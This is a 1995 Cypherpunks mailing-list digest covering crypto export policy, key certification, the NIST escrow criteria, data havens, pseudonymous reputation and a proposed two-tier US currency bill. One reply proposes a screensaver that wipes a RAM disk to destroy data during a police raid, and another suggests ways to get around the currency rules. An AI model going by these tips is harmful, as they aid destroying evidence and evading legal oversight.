In-Reply-To:
Message-ID: <199509041426.KAA24551@yakko.cs.wmich.edu>

Timothy C. May writes:
> Grumpiness warning: I have held my tongue the past few months as all of
> these "this t-shirt has been declared a munition!!!" messages went out, but
> I can hold my tongue no longer.

[...]

> It was this series of posts about whether wearing the "munitions t-shirt"
> near schools was a crime or not that made me think the silly season had
> arrived. If the t-shirt is a munition, and books are munitions, then
> libraries must be real "ammunition dumps," ready to explode at any minute.

"Printer's ink has been running a race against gunpowder these many, many years. Ink is handicapped, in a way, because you can blow up a man with gunpowder in half a second, while it may take twenty years to blow him up with a book. But the gunpowder destroys itself along with its victim, while a book can keep on exploding for centuries."
- Christopher Morley, _The Haunted Bookshop_

Res ipsa loquitur.

--
http://yakko.cs.wmich.edu/~frogfarm ...with that fresh new lemon scent
Don't mess with someone unless they mess with you first. .o.
"Creating and distributing neurolinguistic viruses since 1969"

From cman at communities.com Mon Sep 4 08:14:49 1995
From: cman at communities.com (Douglas Barnes)
Date: Mon, 4 Sep 95 08:14:49 PDT
Subject: Key attributes (was: pseudonyms & list health)
Message-ID:

If anyone still has the flyer from the Crypto '95 rump session, there was a guy there talking about ANSI standards, and one of the things he mentioned in his talk was work they were doing on "key attributes." I spoke with him afterwards, and we had a lively discussion about this matter; especially with regard to the relationship between key certification and key attributes. I argued that certification is just another kind of attribute, while he is fairly hung up on certificate hierarchies, etc.
(Of course, robust and well-implemented attributes could be used to implement a hierarchical certification structure if that's what was desired, but there seems to be a deep-seated feeling among crypto folks of a certain ilk that such structure needs to be hard-coded into things.)

I'll be following up on this matter with him when I am reunited with my notes, which made an unintended trip to SF, while I only went to Mountain View.

>
>I could see such a system initially being piggybacked on PGP keys (the
>signatures would not be understandable by PGP though), although for
>Chaumian credential transfers the keys have to be specially structured
>and that would require a new approach.
>
>Who would be willing and/or interested enough to use such a system if it
>existed?
>
>Hal

From johnl at radix.net Mon Sep 4 08:25:49 1995
From: johnl at radix.net (John A. Limpert)
Date: Mon, 4 Sep 95 08:25:49 PDT
Subject: maximizing cryptographic return
Message-ID: <199509041524.LAA15061@saltmine.radix.net>

At 06:49 PM 9/3/95 -0700, Vladimir Z. Nuri wrote:
>the question of the cost-effectiveness of phone encryption was raised by
>my other message. I would like to question how cheaply good encryption
>could be done on phones, with a poor quality microprocessor.

It doesn't take much of a microprocessor to do real-time encryption and decryption of digitized voice, at least for DES. The problem is the vocoder. A good vocoder needs a fast DSP chip. A custom vocoder chip could cut this cost considerably, look at how cheap data pumps for V.34 modems have become with mass production. If ISDN ever becomes the mass market standard, replacing analog local loops, it would be very inexpensive to add encryption. Even with today's phone system, I can't see why a mass market secure telephone couldn't be built for less than $200. The problem is convincing enough people that they need secure telephones to get that mass market. The secure telephone also needs to be transparent to the users.
It should be able to set up a secure connection without requiring the user to press any buttons or know what hardware is at the other end. The voice quality has to be much better than some of the "Donald Duck" quality systems that have been used in the past. -- John A. Limpert johnl at Radix.Net

From tcmay at got.net Mon Sep 4 09:11:44 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 4 Sep 95 09:11:44 PDT Subject: pseudonyms & list health Message-ID: At 6:13 AM 9/4/95, Futplex wrote: >Deranged Mutant writes: >> My worry is about abuse. One would prefer to save endorsements and find >> a way to remove thumbs-downs... also how to prevent one from overdoing a >> thumbs-up or -down certification for a person (either to inflate or de- >> flate a reputation). > >A few nuisance lawsuits from people who were given thumbs-downs might do the >trick, as with employment recommendations in the U.S. :[ A good point that deserves further comment. Employers have taken to _saying nothing_ about past employees, for fear of lawsuits by disgruntled job seekers. So much for free speech, courtesy of the American legal system. But as we can't change the litigious nature of American society (and maybe European society--I don't know), the emphasis ought to be on digital systems and reputations by pseudonyms. Hal's comment about transferring credentials is one approach. Sort of an automated version of "Pr0duct Cypher says the work of Sue D'Nim is good." At this point, not enough pseudonyms to make it very worthwhile, but someday... >ObTim: As in other reputation markets, some people will spread their blessings >more liberally than others. They do this at the risk of diluting the worth of >each credential granted. It all comes out in the wash. > >A reviewer named Susan Granger, for example, is known to me as a person who >routinely lauds lousy movies. Thus it's simple for me to ignore her positive >recommendations (I've yet to see a negative review from her).
In fact, when >I observe that a new film prominently features her seal of approval in its >advertising, I take that fact as an indication of the lack of praise from >more discriminating reviewers. So a nominal "positive" credential may be >interpreted as an implicit negative credential, depending upon context. Another good point. I always think: "Ah, they couldn't get either Siskel or Ebert to endorse it." As Futplex notes, endorsements by second- or third-tier endorsers are often a _negative_ endorsement.

--Tim May
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From ian at bvsd.k12.co.us Mon Sep 4 09:42:04 1995 From: ian at bvsd.k12.co.us (Ian S. Nelson) Date: Mon, 4 Sep 95 09:42:04 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com> Message-ID: <199509041641.KAA26589@bvsd.k12.co.us> > but for some reason, the NSA keeps humming along...? perhaps > confirming the rule that bureaucracies, like bores at parties, > persist long after they are relevant? Cryptography is a new science; it may be more effective to break into an office than to hack into their computers, but maybe new discoveries will change that. > understand marketing or human psychology. Clipper, the closest the > agency has come to creeping out of the darkness of their coffin, > was a total fiasco. the self-destructing director of NSA whats-his-name > who was running for that FBI position or whatever is another example of how > the inbred spook society has difficulty dealing with anything outside > their artificial reality. I think you are dead wrong.
The NSA has mastered the market psychology. Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS... the NSA has had a hand in them all. DES is by far the most popular cipher, popular enough that it will take years and years to switch to something new. As for the clipper "fiasco," I would argue that it was an excellent marketing move. The NSA is aware that there is only a very very small percentage of society that thinks about crypto; with the internet and what have you it is now possible for this minority to be heard. The NSA proposes clipper, and so we all bitch about it because it's only secure against non-government attacks. Now the public hears this and resists clipper. There isn't another product that is winning support that clipper could have had. You step back and look at it, and the public is exactly where they were 5 years ago, no crypto. Clipper was a no-lose situation for them: if it is adopted only they can read all transactions made with it; if it isn't adopted, everybody can read all transactions; they didn't lose anything. They have some top minds working for them; it's been proven that they have been a few steps ahead of the public for a long time; it's foolish to think they don't understand the psychology of the market. Just as the public starts to desire something like public key crypto, they can publish a standard on it and it is likely to be adopted.

From pfarrell at netcom.com Mon Sep 4 09:55:34 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 4 Sep 95 09:55:34 PDT Subject: Key attributes (was: pseudonyms & list health) Message-ID: <46463.pfarrell@netcom.com> cman at communities.com (Douglas Barnes) writes: > If anyone still has the flyer from the Crypto '95 rump session, > there was a guy there talking about ANSI standards, and one of > the things he mentioned in his talk was work they were doing on > "key attributes."
> I spoke with him afterwards, and we had a lively discussion about > this matter; especially with regard to the relationship between > key certification and key attributes. I argued that certification is > just another kind of attribute, while he is fairly hung up on > certificate hierarchies, etc. Did he perchance work for some US Federal Agency such as NIS&T? Or a large corporation? My small PGP key was created at the National Computer Security Conference in 1992. About half the attendees were NSA, and lots more were from assorted defense and civilian agencies. During the free time, I talked to a bunch of them about Phil's web of trust. I had a really hard time understanding where they were coming from, and they had no clue as to why I thought hierarchical CA chains are so bad. I didn't convince anyone. But I have come to understand that if you spend your entire working life in a job that is structured from the President on down a hierarchy, you can't imagine any other organizational structure. This includes the obvious LEAs such as FBI, ATF, all the Defense folks and spooks like CIA, DIA, NSA, and the standards "setting" folks out at NIS&T. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include

From pfarrell at netcom.com Mon Sep 4 09:55:39 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 4 Sep 95 09:55:39 PDT Subject: Acceptable NIS&T restrictions Message-ID: <46477.pfarrell@netcom.com> If we can break away from t-shirts as munitions... I'm going to the NIS&T session this week. I'm trying to figure out what, if any, part of the process can be made acceptable to those in favor of bringing US policy into the 90s. I'm not sure that this is possible. NIS&T published (and it has been reposted to the list and sci.crypt many times) their goals. Can we make suggestions to any that are acceptable and realistic?
Here are some of their criteria: "Avoiding multiple encryption -- How can the product be designed so as to prevent doubling (or tripling, etc.) the key space of the algorithm?" CME has been suggesting DES | TRAN | DES | TRAN | DES for years. Can they really _avoid_ (i.e. prevent) this? "Disabling the key escrow mechanism -- How can products be made resistant to alteration that would disable or circumvent the key escrow mechanism? How can the "static patch" problem be avoided? How can this be tested?" This is easy in hardware. Is it even possible in software? "Practical Key Access -- How can mechanisms be designed so that repeated involvement of escrow agents is not required for decryption for multiple files/messages during the specified access period?" At least this has a chance of being real. We need to have a suggestion for expiration times for the escrowed keys. This was a huge problem with the initial Clipper. Is there a reasonable middle ground between long term keys such as PGP uses, and the ephemeral keys of a D-H exchange? "Certified escrow agents -- Can products be designed so that only escrow agents certified by the U.S. government (domestic, or under suitable arrangements, foreign) are utilized? What should be the criteria for an acceptable U.S. escrow agent?" We all know that Tim's Flakey Key Escrow Service is most likely not "an acceptable US escrow agent." But since CKE is a good thing, what are the characteristics of an acceptable service to us? I've added the discussion "topics" that NIS&T sent to participants to my WWW pages if you want to see them all, http://www.isse.gmu.edu/~pfarrell/nistmeeting.html But I expect that most of the criteria that I edited out are unacceptable to most on this list. Without further discussion. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. 
Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include

From tcmay at got.net Mon Sep 4 10:09:18 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 4 Sep 95 10:09:18 PDT Subject: The Dangers of Caribbean Data Havens Message-ID: From Bruce Sterling in "Islands in the Net" to various reports of data havens and Internet services being set up by actual people, there has been much speculation about using Caribbean islands for data havens. But the infrastructure has been lacking. Low-bandwidth inter-island links. And now yet another huge hurricane is bearing down on the Lesser Antilles, heading directly for Puerto Rico and Hispaniola (Haiti and Dominican Republic). "Outages" lasting days or weeks after these islands get torn up every few years will not go too well with international commerce. Some fixes may help:
* higher-bandwidth connections, e.g., undersea fiber.
* satellites as primary or secondary connections
* more secure on-island facilities, designed to maintain contact with satellites or fibers even with a Force 4 hurricane direct hit.
The "regulatory arbitrage" aspects still make using the Islands advantageous (though they can be buffeted by political storms as well as physical ones). At least two current or past Cypherpunks are living in the Islands and working on some schemes. Something to think about. Personally, I think a distributed system based on crypto is a more robust approach, the "Libertaria in Cyberspace" view I've talked about.

--Tim May
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From anon-remailer at utopia.hacktic.nl Mon Sep 4 10:25:21 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 4 Sep 95 10:25:21 PDT Subject: Re: Emergency File Wipe Algorithm Message-ID: <199509041725.TAA12314@utopia.hacktic.nl> When a running computer is seized in some sort of law enforcement raid, what are the chances someone would think to back up the contents of a RAMDISK drive prior to powering it down?

From rah at shipwright.com Mon Sep 4 10:42:03 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 4 Sep 95 10:42:03 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: Has anyone heard about this bill? Comments? Cheers, Bob Hettinga >From: glasgow at geoserv.isgs.uiuc.edu (Mary.Glasgow) >Subject: Senate Bill 307 2-tier Money System >Date: 31 Aug 1995 13:54:45 GMT >Organization: University of Illinois at Urbana >Summary: Senate Bill 307 2-Tier Money System >Keywords: Senate Bill 307 2-Tier Money System > >In the Senate of the United States, January 30, 1995, Mr. Leahy introduced >the following bill, which was read twice and referred to the Committee on >Banking, Housing, and Urban Affairs. > >...for purposes of brevity, I will quote only from sections (c) Currency >Exchange and (d) Domestic Use and Nondomestic Use Currency. > >(c) Currency Exchange-- > (1) Plan--Not later than 12 months after the date of enactment of this >section, the Secretary shall develop and begin implementation of a plan to >require the exchange of all existing $100 denomination United States currency >held within and outside of the United States for $100 denomination domestic >use and nondomestic use United States currency issued in accordance with this >section.
> > (2) Exchange Requirements--The plan established under paragraph (1) shall >require the currency to be exchanged-- > (A) at financial institutions regulated under United States law and >subject to United States currency transaction reporting and other money >laundering deterrence requirements; or > (B) at financial institutions that the Secretary finds, because of >treaty obligations, other provisions of law, or other agreements, are >required to report significant transactions in United States currency to >the United States Treasury, and abide by such obligations. > (3) 6-Month Exchange Period-- > (A) In general--During the period beginning on the date that is 12 >months after the date of enactment of this section and ending on the date >that is 18 months after that date of enactment, the Secretary shall permit >the exchange of circulating $100 denomination United States currency for >equal numbers of the domestic use and nondomestic use $100 currency issued >in accordance with this section at institutions described in paragraph (2). > (B) Non-Negotiability--Except for claims pursuant to subsection (e), >beginning on the date that is 18 months after the date of enactment of this >section, the United States Treasury shall not recognize $100 denomination >United States currency issued prior to the date that is 12 months after the >date of enactment of this section as constituting a negotiable claim against >the United States Treasury, and such currency shall not constitute legal >tender for any debts, public or private.
> >(d) Domestic Use and Nondomestic Use Currency--Beginning on the date that is >18 months after the date of enactment of this section-- > (1) domestic use currency, issued in accordance with this section shall >be recognized as constituting a negotiable claim against the United States >Treasury only when presented within the United States, and shall constitute >legal tender for any debts, public or private, only when presented in the >United States, but such currency may be exchanged for equal values of $100 >denomination nondomestic use currency (or other United States currency) only >at financial institutions regulated by United States law and subject to >United States currency transaction reporting and other money laundering >deterrence requirements; and > (2) nondomestic use currency shall be recognized as constituting a >negotiable claim against the United States Treasury, and legal tender >for any debts, public or private, only when presented outside of the United >States, but such currency may be exchanged for equal values of $100 >denomination domestic use currency (or other United States currency) at >financial institutions regulated by United States law and subject to >United States currency transaction reporting and other money laundering >deterrence requirements. > ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional."
--Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From kkennedy at mindspring.com Mon Sep 4 10:57:41 1995 From: kkennedy at mindspring.com (Ken Kennedy) Date: Mon, 4 Sep 95 10:57:41 PDT Subject: Helping out on site In-Reply-To: Message-ID: <199509041757.NAA21117@dylan.mindspring.com> On 2 Sep 1995 20:47:04 -0600, you wrote: >On 2 Sep 1995, Dar Scott wrote: > >> >I finished my first release, a megabyte-sized file done in MORE, a powerful >> >outline processor (which enabled me to maintain notes, make >> >cross-references, and generally manage such a huge writing project). I >> >released it last year, and put it in my anonymous ftp account at >> >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom >> >is often very crowded, though. >> >> After several tries I was not able to get this. Has anyone made it >> available in an alternate location? > >Tim mentioned that we're planning on spiffing up the cypherpunks web >site (including using a real web server) and the cyphernomicon is an >obvious candidate for inclusion - depending on how many people help out, >the new site (a quasi-mirror at first, till we get sameer/et al's >go-ahead) should be live within a couple weeks. > >If you're interested in gathering documents, hacking HTML, or anything >else involved in creating/maintaining a web hierarchy, drop me a line. >The space/delivery of the documents we're providing for free, but I >don't have a budget to hire a staff to do things the "right way" (my way :) >for this project. > >-- > Jay Campbell - Regional Operations Manager > -=-=-=-=-=-=- Sense Networking (Santa Cruz Node) edge at you.got.net > "Shoot the Fruit Loop" 408.469.9400 > > Jay: Let me know if I can be of any assistance. I'm no UNIX guru, but I can find my way around, and I can "hack"(literally! :-) ) HTML (I use the HotDog HTML editor).
I've been lurking around the list for awhile now, and this looks like a good opportunity to be "of service". Just let me know, or reply if you have any questions. Thanks. Later, Ken Kennedy or Finger kenzoid at io.com for PGP public key... http://www.io.com/~kenzoid/ From adwestro at ouray.cudenver.edu Mon Sep 4 10:58:47 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Mon, 4 Sep 95 10:58:47 PDT Subject: The Dangers of Caribbean Data Havens In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 4 Sep 1995, tcmay at got.net (Timothy C. May) wrote: > From Bruce Sterling in "Islands in the Net" to various reports of data > havens and Internet services being set up by actual people, there has been > much speculation about using Caribbean islands for data havens. > But the infrastructure has been lacking. Low-bandwidth inter-island links. > And now yet another huge hurricane is bearing down on the Lesser Antilles, > heading directly for Puerto Rico and Hispaniola (Haiti and Dominican > Republic). > "Outages" lasting days or weeks after these islands get torn up every few > years will not go too well with international commerce. > Some fixes may help: > * higher-bandwidth connections, e.g., undersea fiber. I don't have the citation handy, but I recall reading that Cable & Wireless has plans to link much of the region via undersea fiber over the next few years. I think it will be a simple North-South line -- Virgin Islands to Trinidad and Tobago or something like that, bypassing the Caymans, etc. The cost of the project is outweighed by the gains of eliminating these recurring weather-related outages. In fact, someone (Duncan?) may have posted the press release here over a year ago. 
Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

From terrell at sam.neosoft.com Mon Sep 4 11:02:38 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Mon, 4 Sep 95 11:02:38 PDT Subject: A problem with anonymity Message-ID: <199509041812.NAA06959@sam.neosoft.com> >To: TCMAY at GOT.NET, CYPHERPUNKS at toad.com >Subject: Re: A problem with anonymity >From: monty.harder at famend.com (MONTY HARDER) > > > But if the escrow agent is anonymous, we simply recurse, moving now to >the question of whether anyone can trust the Anonymous Escrow Agency not >to take the money and run. > >TC> (I mention banks because, when you look at it closely, today's banks can >TC> quite easily claim that a customer made a withdrawal when he didn't. That >TC> they don't says more about the nature of persistent businesses than about >TC> any government oversight or security features. This is a side point, but it >TC> bears keeping in mind that the real world of banks and businesses, etc., is >TC> not fully secure, either. And yet it mostly works pretty well. The reasons >TC> for this are interesting to consider.) > > A bank has $$ invested in impressive-looking buildings, (so that >vanishing into the ether and setting up shop elsewhere is rather >difficult) and several officers whose TrueNames are registered with the >appropriate agencies, so that they may be sued if they pull this >crap.
> > While individual stockholders might appreciate the anonymity (and >protection from legal action) of owning stock in a bank or escrow agency >(might just combine the functions, while we're at it), they demand >onymity of the officers with whom they entrust the keys to the >corporation. >Monster at FAmend.Com * > > The real secret is that for most banks the individual transaction is << than the total stream of transactions. Defaulting on a single transaction will show a profit that is minuscule compared to the over-all earnings at stake if the bank's credibility is jeopardized. When banks have gotten into trouble it is frequently when they allow one customer or one transaction to represent a significant share of their business. You have a high probability of being able to trust an escrowee with your $1 if you know he intends to collect commissions on holding $1million for others based on his "trusted" representation.

Buford C. Terrell              1303 San Jacinto Street
Professor of Law               Houston, TX 77002
South Texas College of Law     voice (713)646-1857
terrell at sam.neosoft.com        fax (713)646-1766

From mab at research.att.com Mon Sep 4 12:04:13 1995 From: mab at research.att.com (Matt Blaze) Date: Mon, 4 Sep 95 12:04:13 PDT Subject: my crypto rump session abstract Message-ID: <9509041912.AA06063@merckx.info.att.com> (the one that david sternlight misinterpreted to mean that we had proven that clipper has no back doors): M. Blaze, J. Feigenbaum, F.T. Leighton, "Master Key Cryptosystems", Crypto '95 "rump session" abstract, August 1995. Available as: ftp://research.att.com/dist/mab/mkcs.ps -matt

From sandfort at crl.com Mon Sep 4 12:20:27 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 4 Sep 95 12:20:27 PDT Subject: e$: More fun with cash: Senate Bill 307 In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C'punks, On Mon, 4 Sep 1995, Robert Hettinga wrote: > Has anyone heard about this bill? Comments? > >(c) Currency Exchange-- > > (1) Plan--Not later than 12 months after the date of enactment of this > >section, the Secretary shall develop and begin implementation of a plan to > >require the exchange of all existing $100 denomination United States currency > >held within and outside of the United States for $100 denomination domestic > >use and nondomestic use United States currency issued in accordance with this > >section. . . . > > (1) domestic use currency, issued in accordance with this section shall > >be recognized as constituting a negotiable claim against the United States > >Treasury only when presented within the United States, and shall constitute > >legal tender for any debts, public or private, only when presented in the > >United States, . . . > > (2) nondomestic use currency shall be recognized as constituting a > >negotiable claim against the United States Treasury, and legal tender > >for any debts, public or private, only when presented outside of the > >United States, . . . It's obvious that this bill has very little to do with large-scale money laundering, narcotrafficking or terrorism. All those folks will simply use "domestic use currency" inside or outside of the United States. At worst, it will cause them a one-time problem. Then at whom is the bill really aimed? Average, middle-class Americans, is my guess. Fortunately, it doesn't look too tough to get around. If you have a mattress full of C-notes, I suggest you start using them to buy travelers checks--including a few denominated in strong foreign currencies.
S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From ghio at c2.org Mon Sep 4 13:06:17 1995 From: ghio at c2.org (Matthew Ghio) Date: Mon, 4 Sep 95 13:06:17 PDT Subject: alpha.c2.org nymserver source code Message-ID: I have packaged up the source for the nymserver I run on alpha.c2.org, and written a brief description of how to install it. E-mail me if you want it.

From jlasser at rwd.goucher.edu Mon Sep 4 13:31:43 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 4 Sep 95 13:31:43 PDT Subject: The Dangers of Caribbean Data Havens In-Reply-To: Message-ID: On Mon, 4 Sep 1995, Timothy C. May wrote: > From Bruce Sterling in "Islands in the Net" to various reports of data > havens and Internet services being set up by actual people, there has been > much speculation about using Caribbean islands for data havens. > > But the infrastructure has been lacking. Low-bandwidth inter-island links. [...] > Personally, I think a distributed system based on crypto is a more robust > approach, the "Libertaria in Cyberspace" view I've talked about. For legal purposes, perhaps, set up shop on the Islands. Then have a site somewhere else -- backup of your corporate system, nothing more. And, of course, a net connection -- all for redundancy's sake. If your Euro/American site is merely a mirror of a legal site in another country, and you're the same organization, would it be legal? Hmmmm... this all still needs work... Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
From lwp at mail.msen.com Mon Sep 4 14:08:41 1995 From: lwp at mail.msen.com (Lou Poppler) Date: Mon, 4 Sep 95 14:08:41 PDT Subject: pseudonyms & list health In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 3 Sep 1995 21:51:21 -0700, Hal wrote: } An interesting point. I have long wished that there would be a form of } "credential certificates" which people could give as special signatures } on other people's public keys. Then using Chaumian credential technology } it would be possible to anonymously transfer these credentials from one } pseudonym to another. /.../ } I certainly appreciate these kinds of comments, but it would be even } more useful if such messages were expressed as the kinds of } certificates I am describing. I wonder whether people would be willing } to use a program which would let them issue such "reputation } signatures" of various kinds, and display the signatures which were } present on keys. /.../ } I could see such a system initially being piggybacked on PGP keys (the } signatures would not be understandable by PGP though), although for } Chaumian credential transfers the keys have to be specially structured } and that would require a new approach. When the list was discussing "key as final authority" a while back, Wei Dai posted (on May 31) a program called 'addid' which allows one to add arbitrary strings as user IDs on other peoples' pgp keys. These appear just as though PGP had added them itself, and are signable and displayable by regular old PGP. As an exercise, I grabbed Hal's "insecure key" from the keyserver, and used 'addid' to add a new ID to it, which I then signed. Here's the output of 'pgp -kc 0xcbd301':

Key ring: 'pubring.pgp', looking for user ID "0xcbd301".
Type bits/keyID    Date       User ID
pub   512/4ECBD301 1994/11/29 Hal writes good posts -- Read them all
sig!       2C48CAE9 1995/09/04   Lou Poppler
                                 Hal Finney insecure key
sig!       58214C37 1994/12/01   Hal Finney <74076.1041 at compuserve.com>

(If anyone cares) here is Hal's key cbd301, as summarized above: here is my key 48cae9, which signs the above new ID (and this mail): :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :: Lou Poppler | Doom an evil deed, :: :: http://www.msen.com/~lwp/ | liven a mood.
:: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From johnl at radix.net Mon Sep 4 14:12:34 1995 From: johnl at radix.net (John A. Limpert) Date: Mon, 4 Sep 95 14:12:34 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: <199509042110.RAA22377@saltmine.radix.net> At 01:41 PM 9/4/95 -0400, Robert Hettinga wrote: >Has anyone heard about this bill? Comments? This idea seems to get proposed every few years. In the past it has been shelved as soon as someone figures out the disaster that would be caused by the resultant decline in the value of the dollar. The U.S. Government has to be nice to foreigners that hold large quantities of dollars and treasury securities, even if it doesn't care about the political consequences at home. -- John A. Limpert johnl at Radix.Net

From unicorn at access.digex.net Mon Sep 4 14:14:41 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 4 Sep 95 14:14:41 PDT Subject: e$: More fun with cash: Senate Bill 307 In-Reply-To: Message-ID: On Mon, 4 Sep 1995, Sandy Sandfort wrote: > Date: Mon, 4 Sep 1995 11:35:20 -0700 (PDT) > From: Sandy Sandfort > To: Robert Hettinga > Cc: cypherpunks at toad.com > Subject: Re: e$: More fun with cash: Senate Bill 307 > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Mon, 4 Sep 1995, Robert Hettinga wrote: > > > Has anyone heard about this bill? Comments?
> >
> > >(c) Currency Exchange--
> > > (1) Plan--Not later than 12 months after the date of enactment of this
> > >section, the Secretary shall develop and begin implementation of a plan to
> > >require the exchange of all existing $100 denomination United States currency
> > >held within and outside of the United States for $100 denomination domestic
> > >use and nondomestic use United States currency issued in accordance with this
> > >section.
> > . . .
> > > (1) domestic use currency, issued in accordance with this section shall
> > >be recognized as constituting a negotiable claim against the United States
> > >Treasury only when presented within the United States, and shall constitute
> > >legal tender for any debts, public or private, only when presented in the
> > >United States, . . .
> > > (2) nondomestic use currency shall be recognized as constituting a
> > >negotiable claim against the United States Treasury, and legal tender
> > >for any debts, public or private, only when presented outside of the
> > >United States, . . .
>
> It's obvious that this bill has very little to do with large-scale
> money laundering, narcotrafficking nor terrorism. All those folks
> will simply use "domestic use currency" inside or outside of the
> United States. At worst, it will cause them a one-time problem.
>
> Then at whom is the bill really aimed? Average, middle-class
> Americans, is my guess. Fortunately, it doesn't look too tough
> to get around. If you have a mattress full of C-notes, I suggest
> you start using them to buy travelers checks--including a few
> denominated in strong foreign currencies.

Actually it was aimed at the rumors that Iran had been printing U.S. currency on a large scale and using it abroad. When I say Iran, I mean a government backed program. New York Times had an article on the matter last year. With enough interest I will try to Lexis/Nexus it.
While there was some evidence that Iran had indeed been forging notes, the extent was unclear/minimal. Of course, with this kind of rumor there is the issue of confidence in the currency as well as actual threat.

The first response was the inset of the polyester and foil thread in the bills (and NO they can't detect quantity as you go through airport sensors, and don't ask me again). The foreign traveller will notice the serious scrutiny all U.S. bills abroad will receive, particular attention paid to the presence of the strip. Many foreign shops will not take U.S. bills which are older and have no strip as a result.

This new plan is total lunacy of course, and I expect it to fail, but the real zap is on anyone with a spare million in counterfeit or undeclared currency.

I might add, try being a tourist in Estonia and presenting U.S. bills that are no good in the U.S. You'll be about as popular as someone in the Midwest with Canadian bills.

> S a n d y

---
00B9289C28DC0E55 no one becomes utterly wicked all at once - the power of knowledge lies in its use
E16D5378B81E1C96 seek the truth without end, speaks under the rose - important!
*New Key Information* - Finger for key revocation and latest key update.

From johnl at radix.net Mon Sep 4 14:21:11 1995
From: johnl at radix.net (John A. Limpert)
Date: Mon, 4 Sep 95 14:21:11 PDT
Subject: The Dangers of Caribbean Data Havens
Message-ID: <199509042119.RAA22672@saltmine.radix.net>

At 10:19 AM 9/4/95 -0700, Timothy C. May wrote:
>"Outages" lasting days or weeks after these islands get torn up every few
>years will not go too well with international commerce.

I thought there were a number of bank and credit card data entry centers that had already moved to the Caribbean. They may not care if the local phone service gets wiped out for several weeks if they have a hardened line to the nearest Cable & Wireless earth station.

--
John A.
Limpert
johnl at Radix.Net

From unicorn at access.digex.net Mon Sep 4 14:36:54 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Mon, 4 Sep 95 14:36:54 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To: <199509041725.TAA12314@utopia.hacktic.nl>
Message-ID:

On Mon, 4 Sep 1995, Anonymous wrote:

> Date: Mon, 4 Sep 1995 19:25:07 +0200
> From: Anonymous
> To: mail2news at utopia.hacktic.nl, cypherpunks at toad.com
> Newgroups: alt.security.pgp, alt.politics.org.fbi
> Subject: Re: Emergency File Wipe Algorithim
>
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?
>

Why would you even ask this question? If the odds are > 0 (which they are) they are too high as the solution is simple. A screensaver which shuts down the system entirely if anything but "}" is pressed. If any key but the secret one is pressed by an excited agent, the ramdisk is gone. If the computer is simply powered down, the ramdisk is gone.

I suggest, rather than a ramdisk however, an encrypted partition a la CryptDisk or Secure(Drive? Device?).

---
00B9289C28DC0E55 no one becomes utterly wicked all at once - the power of knowledge lies in its use
E16D5378B81E1C96 seek the truth without end, speaks under the rose - important!
*New Key Information* - Finger for key revocation and latest key update.

From MAILER-DAEMON at access.digex.net Mon Sep 4 14:40:09 1995
From: MAILER-DAEMON at access.digex.net (Mail Delivery Subsystem)
Date: Mon, 4 Sep 95 14:40:09 PDT
Subject: Returned mail: User unknown
Message-ID: <199509042136.RAA18457@access2.digex.net>

The original message was received at Mon, 4 Sep 1995 17:35:13 -0400
from unicorn at localhost

   ----- The following addresses had delivery problems -----
